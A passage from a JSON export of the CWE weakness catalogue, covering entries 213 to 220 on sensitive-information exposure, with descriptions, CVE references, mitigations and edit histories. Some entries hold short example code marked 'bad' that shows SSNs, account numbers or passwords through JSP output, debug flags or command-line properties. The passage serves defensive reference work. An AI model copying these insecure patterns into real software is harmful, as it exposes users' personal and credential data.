modification of incoming/outgoing data so that it conforms to specifications.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Cross-boundary Cleansing Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Improper Cross-boundary Cleansing","attr":{"@_Date":"2010-02-16"}},{"#text":"Improper Cross-boundary Removal of Sensitive Data","attr":{"@_Date":"2020-02-24"}}]}},"213":{"attr":{"@_ID":"213","@_Name":"Exposure of Sensitive Information Due to Incompatible Policies","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product\'s intended functionality exposes information to certain actors in accordance with the developer\'s security policy, but this information is regarded as sensitive according to the intended security policies of other stakeholders such as the product\'s administrator, users, or others whose information is being processed.","Extended_Description":{"xhtml:p":"When handling information, the developer must consider whether the information is regarded as sensitive by different stakeholders, such as users or administrators.  Each stakeholder effectively has its own intended security policy that the product is expected to uphold.  When a developer does not treat that information as sensitive, this can introduce a vulnerability that violates the expectations of the product\'s users."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Policy","Note":"This can occur when the product\'s policy does not account for all relevant stakeholders, or when the policies of other stakeholders are not interpreted properly."},{"Phase":"Requirements","Note":"This can occur when requirements do not explicitly account for all relevant stakeholders."},{"Phase":"Architecture and Design","Note":"Communications or data exchange frameworks may be chosen that exchange or provide access to more information than strictly needed."},{"Phase":"Implementation","Note":"This can occur when the developer does not properly track the flow of sensitive information and how it is exposed, e.g., via an API."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-130"},"Intro_Text":"This code displays some information on a web page.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":"Social Security Number: &lt;%= ssn %&gt;&lt;/br&gt;Credit Card Number: &lt;%= ccn %&gt;"},"Body_Text":"The code displays a user\'s credit card and social security numbers, even though they aren\'t absolutely necessary."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1725","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1725"},{"Reference":"CVE-2004-0033","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0033"},{"Reference":"CVE-2003-1181","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1181"},{"Reference":"CVE-2004-1422","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1422"},{"Reference":"CVE-2004-1590","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1590"},{"Reference":"CVE-2003-1038","Description":"Product lists DLLs and full pathnames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1038"},{"Reference":"CVE-2005-1205","Description":"Telnet protocol allows servers to obtain sensitive environment information from clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205"},{"Reference":"CVE-2005-0488","Description":"Telnet protocol allows servers to obtain sensitive environment information from clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0488"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Intended information leak"}},"Notes":{"Note":[{"#text":"This entry is being considered for deprecation.  It overlaps many other entries related to information exposures.  It might not be essential to preserve this entry, since other key stakeholder policies are covered elsewhere, e.g. personal privacy leaks (CWE-359) and system-level exposures that are important to system administrators (CWE-497).","attr":{"@_Type":"Maintenance"}},{"#text":"In vulnerability theory terms, this covers cases in which the developer\'s Intended Policy allows the information to be made available, but the information might be in violation of a Universal Policy in which the product\'s administrator should have control over which information is considered sensitive and therefore should not be exposed.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Other_Notes, Relationship_Notes, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Intended Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Intentional Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"214":{"attr":{"@_ID":"214","@_Name":"Invocation of Process Using Visible Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A process is invoked with sensitive command-line arguments, environment variables, or other elements that can be seen by other processes on the operating system.","Extended_Description":"Many operating systems allow a user to list information about processes that are owned by other users. Other users could see information such as command line arguments or environment variable settings. When this data contains sensitive information such as credentials, it might allow other users to launch an attack against the software or related resources.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"497","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the example below, the password for a keystore file is read from a system property.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String keystorePass = System.getProperty(\\"javax.net.ssl.keyStorePassword\\");if (keystorePass == null) {}...","xhtml:br":["","",""],"xhtml:div":{"#text":"System.err.println(\\"ERROR: Keystore password not specified.\\");System.exit(-1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"If the property is defined on the command line when the program is invoked (using the -D... syntax), the password may be displayed in the OS process list."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1387","Description":"password passed on command line","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1387"},{"Reference":"CVE-2005-2291","Description":"password passed on command line","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2291"},{"Reference":"CVE-2001-1565","Description":"username/password on command line allows local users to view via \\"ps\\" or other process listing programs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1565"},{"Reference":"CVE-2004-1948","Description":"Username/password on command line allows local users to view via \\"ps\\" or other process listing programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1948"},{"Reference":"CVE-1999-1270","Description":"PGP passphrase provided as command line argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1270"},{"Reference":"CVE-2004-1058","Description":"Kernel race condition allows reading of environment variables of a process that is still spawning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1058"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Process information infoleak to other processes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"Under-studied, especially environment variables.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Process Information Leak to Other Processes","attr":{"@_Date":"2008-04-11"}},{"#text":"Process Environment Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Process Environment","attr":{"@_Date":"2020-02-24"}}]}},"215":{"attr":{"@_ID":"215","@_Name":"Insertion of Sensitive Information Into Debugging Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production.","Extended_Description":"When debugging, it may be necessary to report detailed information to the programmer.  However, if the debugging code is not disabled when the application is operating in a production environment, then this sensitive information may be exposed to attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Do not leave debug statements that could be executed in the source code. Ensure that all debug information is eradicated before releasing the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-131"},"Intro_Text":"The following program changes its behavior based on a debug flag.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% if (Boolean.getBoolean(\\"debugEnabled\\")) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"%&gt;User account number: &lt;%= acctNo %&gt;&lt;%} %&gt;","xhtml:br":["","","",""]}}}},"Body_Text":"The code writes sensitive debug information to the client browser if the \\"debugEnabled\\" flag is set to true ."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2268","Description":"Password exposed in debug information.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2268"},{"Reference":"CVE-2002-0918","Description":"CGI script includes sensitive information in debug messages when an error is triggered.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0918"},{"Reference":"CVE-2003-1078","Description":"FTP client with debug option enabled shows password to the screen.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1078"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Infoleak Using Debug Information"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"This overlaps other categories.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Debug Information","attr":{"@_Date":"2010-09-27"}},{"#text":"Information Exposure Through Debug Information","attr":{"@_Date":"2020-02-24"}}]}},"216":{"attr":{"@_ID":"216","@_Name":"DEPRECATED: Containment Errors (Container Errors)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated, as it was not effective as a weakness and was structured more like a category. In addition, the name is inappropriate, since the \\"container\\" term is widely understood by developers in different ways than originally intended by PLOVER, the original source for this entry.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":{"#text":"Containment Errors (Container Errors)","attr":{"@_Date":"2020-02-24"}}}},"217":{"attr":{"@_ID":"217","@_Name":"DEPRECATED: Failure to Protect Stored Data from Modification","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it incorporated and confused multiple weaknesses. The issues formerly covered in this entry can be found at CWE-766 and CWE-767.","Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-20","Modification_Comment":"deprecated this entry in favor of new entries which focus on the multiple weaknesses formerly described here, CWE-766 and CWE-767"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Failure to Protect Stored Data from Modification","attr":{"@_Date":"2009-05-27"}}}},"218":{"attr":{"@_ID":"218","@_Name":"DEPRECATED: Failure to provide confidentiality for stored data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because it was a duplicate of CWE-493. All content has been transferred to CWE-493.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Failure to Provide Confidentiality for Stored Data","attr":{"@_Date":"2008-09-09"}},{"#text":"DEPRECATED (Duplicate): Failure to provide confidentiality for stored data","attr":{"@_Date":"2021-07-20"}}]}},"219":{"attr":{"@_ID":"219","@_Name":"Storage of File with Sensitive Data Under Web Root","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties.","Extended_Description":"Besides public-facing web pages and code, applications may store sensitive data, code that is not directly invoked, or other files under the web document root of the web server.  If the server is not configured or otherwise used to prevent direct access to those files, then attackers may obtain this sensitive data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","System Configuration"],"Description":"Avoid storing information under the web root directory."},{"Phase":"System Configuration","Description":"Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the web directory."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1835","Description":"Data file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1835"},{"Reference":"CVE-2005-2217","Description":"Data file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2217"},{"Reference":"CVE-2002-1449","Description":"Username/password in data file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1449"},{"Reference":"CVE-2002-0943","Description":"Database file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0943"},{"Reference":"CVE-2005-1645","Description":"database file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1645"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive Data Under Web Root"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":{"#text":"Sensitive Data Under Web Root","attr":{"@_Date":"2020-02-24"}}}},"220":{"attr":{"@_ID":"220","@_Name":"Storage of File With Sensitive Data Under FTP Root","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive data under the FTP server root with insufficient access control, which might make it accessible to untrusted parties.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Various Unix FTP servers require a password file that is under the FTP root, due to use of 